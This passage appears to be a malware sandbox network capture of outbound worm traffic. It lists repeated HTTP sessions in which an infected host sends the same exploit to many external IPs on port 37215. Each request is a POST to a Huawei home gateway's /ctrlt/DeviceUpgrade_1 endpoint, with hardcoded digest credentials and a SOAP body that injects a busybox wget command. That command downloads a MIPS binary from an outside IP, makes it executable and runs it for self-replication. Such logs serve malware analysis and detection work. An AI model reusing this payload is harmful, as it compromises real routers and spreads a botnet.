                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2351192.168.2.1343460157.221.88.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624097109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2352192.168.2.133528298.69.174.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624109983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2353192.168.2.1359368197.254.106.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624123096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2354192.168.2.1347918197.55.205.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624129057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2355192.168.2.133464648.42.185.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624133110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2356192.168.2.1342850157.57.234.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624150038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2357192.168.2.1357836157.154.243.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624339104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2358192.168.2.1356118157.126.10.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624352932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2359192.168.2.133599641.146.238.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624357939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2360192.168.2.1346450157.54.204.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624366999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
